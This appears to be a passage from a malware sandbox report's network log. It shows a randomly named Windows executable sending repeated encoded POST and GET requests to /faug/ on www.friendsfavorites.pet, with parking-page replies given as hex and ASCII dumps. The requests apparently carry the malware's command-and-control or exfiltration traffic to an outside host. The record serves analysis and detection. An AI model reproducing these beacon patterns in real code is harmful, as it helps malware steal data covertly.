                                  vary: sec-ch-prefers-color-scheme
                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XE26VrHR70uM6/Udl9tMY62wHugD1KhPYKaDpAtnryRcmK4VOQnaMcavSfv9Jrcy3CK6mhY7K9G6aW8OyqIdnQ==
                                  set-cookie: parking_session=4309756b-0b3b-4b35-8f74-1e2177d42eed; expires=Mon, 27 May 2024 10:50:27 GMT; path=/
                                  connection: close
                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 58 45 32 36 56 72 48 52 37 30 75 4d 36 2f 55 64 6c 39 74 4d 59 36 32 77 48 75 67 44 31 4b 68 50 59 4b 61 44 70 41 74 6e 72 79 52 63 6d 4b 34 56 4f 51 6e 61 4d 63 61 76 53 66 76 39 4a 72 63 79 33 43 4b 36 6d 68 59 37 4b 39 47 36 61 57 38 4f 79 71 49 64 6e 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XE26VrHR70uM6/Udl9tMY62wHugD1KhPYKaDpAtnryRcmK4VOQnaMcavSfv9Jrcy3CK6mhY7K9G6aW8OyqIdnQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                  May 27, 2024 12:35:27.330101967 CEST224INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDMwOTc1NmItMGIzYi00YjM1LThmNzQtMWUyMTc3ZDQyZWVkIiwicGFnZV9
                                  May 27, 2024 12:35:27.330115080 CEST751INData Raw: 30 61 57 31 6c 49 6a 6f 78 4e 7a 45 32 4f 44 41 32 4d 54 49 33 4c 43 4a 77 59 57 64 6c 58 33 56 79 62 43 49 36 49 6d 68 30 64 48 41 36 4c 79 39 33 64 33 63 75 5a 48 4a 6b 59 58 5a 70 5a 47 64 73 59 58 4e 7a 62 57 46 75 4c 6d 4e 76 62 53 38 32 4d
                                  Data Ascii: 0aW1lIjoxNzE2ODA2MTI3LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZHJkYXZpZGdsYXNzbWFuLmNvbS82MXFoLz80aD0za29BQTNTT0l5d0lCUkMzdGQvbTl1QU9vSjJ2VXIwODI1NFlFenkrVUhuQkxhNVRmMWUwWTJkMUcyZ2VPc2lkNXY2RGxtejBqTkI3RHRiYUpPVXJSWVozTG9vOWZITGVFT1FiTnM5a1JsNGIxNC9HM2


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  21192.168.2.749732199.59.243.225806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:35:32.480165958 CEST772OUTPOST /faug/ HTTP/1.1
                                  Host: www.friendsfavorites.pet
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.friendsfavorites.pet
                                  Connection: close
                                  Content-Length: 215
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.friendsfavorites.pet/faug/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 74 53 64 4c 66 6a 75 79 64 7a 64 7a 49 67 53 58 58 35 46 30 62 37 79 75 39 34 36 39 52 7a 38 52 72 64 48 41 36 37 31 47 48 53 77 77 75 7a 64 72 71 78 4e 7a 30 64 71 74 34 62 52 42 55 47 6a 4b 77 4b 35 38 62 39 53 48 41 46 64 6f 4f 48 46 39 79 66 36 30 55 45 68 63 78 43 4e 73 53 78 55 44 43 39 54 64 55 51 47 67 6e 44 5a 37 70 63 6b 32 32 51 49 48 61 55 63 69 76 43 77 4b 72 42 4e 6f 54 31 62 70 73 30 50 77 46 49 41 4f 4c 74 30 46 6d 7a 55 63 71 71 4a 5a 43 73 4a 67 6e 56 6a 4b 5a 2f 33 65 68 41 79 6d 63 36 63 32 67 42 58 55 30 6f 4c 2f 59 33 42 66 51 61 6c 55 4a 77 64 33 57 4f 43 4d 70 42 59 4c 63 5a 69 31 62 58 36 67 42 67 3d 3d
                                  Data Ascii: 4h=tSdLfjuydzdzIgSXX5F0b7yu9469Rz8RrdHA671GHSwwuzdrqxNz0dqt4bRBUGjKwK58b9SHAFdoOHF9yf60UEhcxCNsSxUDC9TdUQGgnDZ7pck22QIHaUcivCwKrBNoT1bps0PwFIAOLt0FmzUcqqJZCsJgnVjKZ/3ehAymc6c2gBXU0oL/Y3BfQalUJwd3WOCMpBYLcZi1bX6gBg==
                                  May 27, 2024 12:35:32.942826986 CEST1236INHTTP/1.1 200 OK
                                  date: Mon, 27 May 2024 10:35:32 GMT
                                  content-type: text/html; charset=utf-8
                                  content-length: 1146
                                  x-request-id: dae7895c-ca36-49e6-b177-ce966b57ca8f
                                  cache-control: no-store, max-age=0
                                  accept-ch: sec-ch-prefers-color-scheme
                                  critical-ch: sec-ch-prefers-color-scheme
                                  vary: sec-ch-prefers-color-scheme
                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hHazujVigpJNO5AHa5gFmIBksfOPm3IprWAhlVzltavNXrC/60wX+bIASGuqdTn9sh16zZbAUm51f7OOMGdidw==
                                  set-cookie: parking_session=dae7895c-ca36-49e6-b177-ce966b57ca8f; expires=Mon, 27 May 2024 10:50:32 GMT; path=/
                                  connection: close
                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 68 48 61 7a 75 6a 56 69 67 70 4a 4e 4f 35 41 48 61 35 67 46 6d 49 42 6b 73 66 4f 50 6d 33 49 70 72 57 41 68 6c 56 7a 6c 74 61 76 4e 58 72 43 2f 36 30 77 58 2b 62 49 41 53 47 75 71 64 54 6e 39 73 68 31 36 7a 5a 62 41 55 6d 35 31 66 37 4f 4f 4d 47 64 69 64 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hHazujVigpJNO5AHa5gFmIBksfOPm3IprWAhlVzltavNXrC/60wX+bIASGuqdTn9sh16zZbAUm51f7OOMGdidw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                  May 27, 2024 12:35:32.942873001 CEST599INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZGFlNzg5NWMtY2EzNi00OWU2LWIxNzctY2U5NjZiNTdjYThmIiwicGFnZV90aW1lIjoxNzE2ODA2MT


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  22192.168.2.749733199.59.243.225806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:35:35.066447973 CEST792OUTPOST /faug/ HTTP/1.1
                                  Host: www.friendsfavorites.pet
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.friendsfavorites.pet
                                  Connection: close
                                  Content-Length: 235
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.friendsfavorites.pet/faug/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 74 53 64 4c 66 6a 75 79 64 7a 64 7a 61 78 69 58 62 36 64 30 64 62 79 68 68 6f 36 39 59 54 38 64 72 63 37 41 36 2f 6c 73 45 67 55 77 75 52 46 72 72 7a 31 7a 33 64 71 74 77 37 52 41 4a 57 6a 2f 77 4b 6b 42 62 39 75 48 41 46 4a 6f 4f 47 56 39 31 75 36 31 56 55 68 61 39 69 4e 75 52 42 55 44 43 39 54 64 55 51 53 4b 6e 43 78 37 6f 74 30 32 6b 45 63 45 62 55 63 6a 6f 43 77 4b 39 78 4e 6b 54 31 62 62 73 32 36 34 46 4c 34 4f 4c 73 6b 46 6d 43 55 62 67 71 4a 62 4d 4d 49 2f 76 46 57 30 63 66 79 6b 68 33 43 49 47 64 49 63 6f 58 4b 32 75 4b 48 54 47 6d 35 6b 55 59 42 69 65 57 41 43 55 50 47 55 6b 6a 73 71 44 75 48 66 57 46 62 6b 58 55 78 74 74 50 65 36 52 53 45 42 4a 57 36 5a 5a 41 34 72 70 76 59 3d
                                  Data Ascii: 4h=tSdLfjuydzdzaxiXb6d0dbyhho69YT8drc7A6/lsEgUwuRFrrz1z3dqtw7RAJWj/wKkBb9uHAFJoOGV91u61VUha9iNuRBUDC9TdUQSKnCx7ot02kEcEbUcjoCwK9xNkT1bbs264FL4OLskFmCUbgqJbMMI/vFW0cfykh3CIGdIcoXK2uKHTGm5kUYBieWACUPGUkjsqDuHfWFbkXUxttPe6RSEBJW6ZZA4rpvY=
                                  May 27, 2024 12:35:35.525912046 CEST1236INHTTP/1.1 200 OK
                                  date: Mon, 27 May 2024 10:35:35 GMT
                                  content-type: text/html; charset=utf-8
                                  content-length: 1146
                                  x-request-id: b8c11e3f-8a7a-46a9-bde4-e018140cfce3
                                  cache-control: no-store, max-age=0
                                  accept-ch: sec-ch-prefers-color-scheme
                                  critical-ch: sec-ch-prefers-color-scheme
                                  vary: sec-ch-prefers-color-scheme
                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hHazujVigpJNO5AHa5gFmIBksfOPm3IprWAhlVzltavNXrC/60wX+bIASGuqdTn9sh16zZbAUm51f7OOMGdidw==
                                  set-cookie: parking_session=b8c11e3f-8a7a-46a9-bde4-e018140cfce3; expires=Mon, 27 May 2024 10:50:35 GMT; path=/
                                  connection: close
                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 68 48 61 7a 75 6a 56 69 67 70 4a 4e 4f 35 41 48 61 35 67 46 6d 49 42 6b 73 66 4f 50 6d 33 49 70 72 57 41 68 6c 56 7a 6c 74 61 76 4e 58 72 43 2f 36 30 77 58 2b 62 49 41 53 47 75 71 64 54 6e 39 73 68 31 36 7a 5a 62 41 55 6d 35 31 66 37 4f 4f 4d 47 64 69 64 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hHazujVigpJNO5AHa5gFmIBksfOPm3IprWAhlVzltavNXrC/60wX+bIASGuqdTn9sh16zZbAUm51f7OOMGdidw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                  May 27, 2024 12:35:35.525933027 CEST599INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjhjMTFlM2YtOGE3YS00NmE5LWJkZTQtZTAxODE0MGNmY2UzIiwicGFnZV90aW1lIjoxNzE2ODA2MT


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  23192.168.2.749734199.59.243.225806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:35:37.631027937 CEST1805OUTPOST /faug/ HTTP/1.1
                                  Host: www.friendsfavorites.pet
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.friendsfavorites.pet
                                  Connection: close
                                  Content-Length: 1247
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.friendsfavorites.pet/faug/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 74 53 64 4c 66 6a 75 79 64 7a 64 7a 61 78 69 58 62 36 64 30 64 62 79 68 68 6f 36 39 59 54 38 64 72 63 37 41 36 2f 6c 73 45 67 63 77 74 69 4e 72 72 53 31 7a 32 64 71 74 2b 62 52 46 4a 57 6a 59 77 4b 73 4e 62 39 6a 77 41 47 78 6f 4e 68 56 39 30 63 65 31 66 55 68 61 31 43 4e 74 53 78 55 73 43 39 69 57 55 51 43 4b 6e 43 78 37 6f 75 38 32 30 67 49 45 57 30 63 69 76 43 77 4f 72 42 4d 78 54 31 43 73 73 31 57 6f 46 36 59 4f 49 4e 55 46 67 6b 49 62 6f 71 4a 64 4c 4d 49 33 76 46 4b 52 63 66 76 64 68 79 2b 69 47 61 6b 63 35 54 66 4a 7a 70 62 79 53 41 68 79 62 62 52 75 5a 6b 59 74 56 4a 43 49 72 52 78 50 41 75 53 6a 49 6a 6a 79 58 54 55 67 71 5a 75 38 4f 32 67 77 47 42 54 49 63 79 30 7a 30 4b 6d 50 76 7a 33 47 33 58 47 56 5a 62 33 58 30 35 77 67 44 59 42 46 4c 78 6d 71 75 57 2f 64 73 6a 79 43 61 61 67 69 63 45 37 79 79 36 6a 67 55 6a 68 52 2f 39 78 55 34 37 53 7a 77 74 62 7a 73 38 42 32 36 65 50 64 35 61 6d 4a 4d 32 48 38 4d 64 36 57 56 63 36 4d 59 42 76 44 47 45 39 4f 43 54 4c 66 52 67 2b 72 6e 45 76 [TRUNCATED]
                                  Data Ascii: 4h=tSdLfjuydzdzaxiXb6d0dbyhho69YT8drc7A6/lsEgcwtiNrrS1z2dqt+bRFJWjYwKsNb9jwAGxoNhV90ce1fUha1CNtSxUsC9iWUQCKnCx7ou820gIEW0civCwOrBMxT1Css1WoF6YOINUFgkIboqJdLMI3vFKRcfvdhy+iGakc5TfJzpbySAhybbRuZkYtVJCIrRxPAuSjIjjyXTUgqZu8O2gwGBTIcy0z0KmPvz3G3XGVZb3X05wgDYBFLxmquW/dsjyCaagicE7yy6jgUjhR/9xU47Szwtbzs8B26ePd5amJM2H8Md6WVc6MYBvDGE9OCTLfRg+rnEv+IvjMJWeDzD9cs9wz+I7JEhUQOCbSeLdP/xneSTZ2i060aQFvZKpyvSXQzATS1ZLb7Y9nJQ4hmiZXXp80Da2uC3r2mcKa6Hd8WyBAdGP5HYKuoV/Va+L746EJ+I2ieQhr3UX0M7uo/Z+Sz6vH+QHf/e0A7euYlf/0WpMD6X0PfT4jfgP+Jl/PSz5YPL0S1UmESgBkWrFU5bjXG24luZkIb7lIBJFxR5CsFCk61QSFG6aMy8eJQD01uTY+aAQDHAdl9DxLz9bprgSta+UDL6PszBxdtFdNNX7JmdWf7iOrl0aX+bcSG+hiVANa/a4HwkK3vsz2/QfumezX1lmlgJ5RpduwuqzspRpz954WK7O7J3RL1qvCnqzQuE3EkqpYbGQ6DT/mQdFSSWfaK4ckJAy7BkqnbQHUN98uer/gSGGw9Qc8gkN36PlfSuudmrbhaFIBNF3uvFwhxPZt4c7KRJ9LwF6/LEy+UGCGhimx/4Ypv2btYDAVmhzRWDBAfhBekoWeXLlzR9nzu+fxRY82rCDhDLj00Q3CiyacIr6bKbhgRL+XJsNNrNlVUSJMkWqSSm/CkGQX/65jsynsvaRy7whOCMIIDALC7JBOvhzUx8+EFh2w6B8jxvIwWaDvXq49lk1okLQ37OakQ1ZBbA6P45zNjU732CozDD8b5 [TRUNCATED]
                                  May 27, 2024 12:35:38.103174925 CEST1236INHTTP/1.1 200 OK
                                  date: Mon, 27 May 2024 10:35:37 GMT
                                  content-type: text/html; charset=utf-8
                                  content-length: 1146
                                  x-request-id: a401738a-dfd5-437a-aa06-802b10899591
                                  cache-control: no-store, max-age=0
                                  accept-ch: sec-ch-prefers-color-scheme
                                  critical-ch: sec-ch-prefers-color-scheme
                                  vary: sec-ch-prefers-color-scheme
                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hHazujVigpJNO5AHa5gFmIBksfOPm3IprWAhlVzltavNXrC/60wX+bIASGuqdTn9sh16zZbAUm51f7OOMGdidw==
                                  set-cookie: parking_session=a401738a-dfd5-437a-aa06-802b10899591; expires=Mon, 27 May 2024 10:50:38 GMT; path=/
                                  connection: close
                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 68 48 61 7a 75 6a 56 69 67 70 4a 4e 4f 35 41 48 61 35 67 46 6d 49 42 6b 73 66 4f 50 6d 33 49 70 72 57 41 68 6c 56 7a 6c 74 61 76 4e 58 72 43 2f 36 30 77 58 2b 62 49 41 53 47 75 71 64 54 6e 39 73 68 31 36 7a 5a 62 41 55 6d 35 31 66 37 4f 4f 4d 47 64 69 64 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hHazujVigpJNO5AHa5gFmIBksfOPm3IprWAhlVzltavNXrC/60wX+bIASGuqdTn9sh16zZbAUm51f7OOMGdidw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                  May 27, 2024 12:35:38.103190899 CEST599INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTQwMTczOGEtZGZkNS00MzdhLWFhMDYtODAyYjEwODk5NTkxIiwicGFnZV90aW1lIjoxNzE2ODA2MT


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  24192.168.2.749735199.59.243.225806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:35:40.167095900 CEST495OUTGET /faug/?4h=gQ1rcTKRTEdEYijsQ7RFFauKs4+hYTESjtLv7rh/BlgU+Ddcsh0s2+qhlb94LlvEhZt7Uc7VfShGPHZ40PDTJ1kF4z42d0MBHK6AIRS14RYMt5cJ4UQYX3B6sCkK/z4FUX6qhl+TCqln&623=YLI8v8eXd0Y HTTP/1.1
                                  Host: www.friendsfavorites.pet
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:35:40.641211987 CEST1236INHTTP/1.1 200 OK
                                  date: Mon, 27 May 2024 10:35:40 GMT
                                  content-type: text/html; charset=utf-8
                                  content-length: 1526
                                  x-request-id: ea446925-32fc-4363-bd29-6d287756021c
                                  cache-control: no-store, max-age=0
                                  accept-ch: sec-ch-prefers-color-scheme
                                  critical-ch: sec-ch-prefers-color-scheme
                                  vary: sec-ch-prefers-color-scheme
                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_aTE9tiCm+O+OLCC2MObjFajn4X/pKZhEdayK2IXV5lkVOoEouigKukITTqOf6FTBPj/Io4wvH0P8dOUXUJFKFA==
                                  set-cookie: parking_session=ea446925-32fc-4363-bd29-6d287756021c; expires=Mon, 27 May 2024 10:50:40 GMT; path=/
                                  connection: close
                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 61 54 45 39 74 69 43 6d 2b 4f 2b 4f 4c 43 43 32 4d 4f 62 6a 46 61 6a 6e 34 58 2f 70 4b 5a 68 45 64 61 79 4b 32 49 58 56 35 6c 6b 56 4f 6f 45 6f 75 69 67 4b 75 6b 49 54 54 71 4f 66 36 46 54 42 50 6a 2f 49 6f 34 77 76 48 30 50 38 64 4f 55 58 55 4a 46 4b 46 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 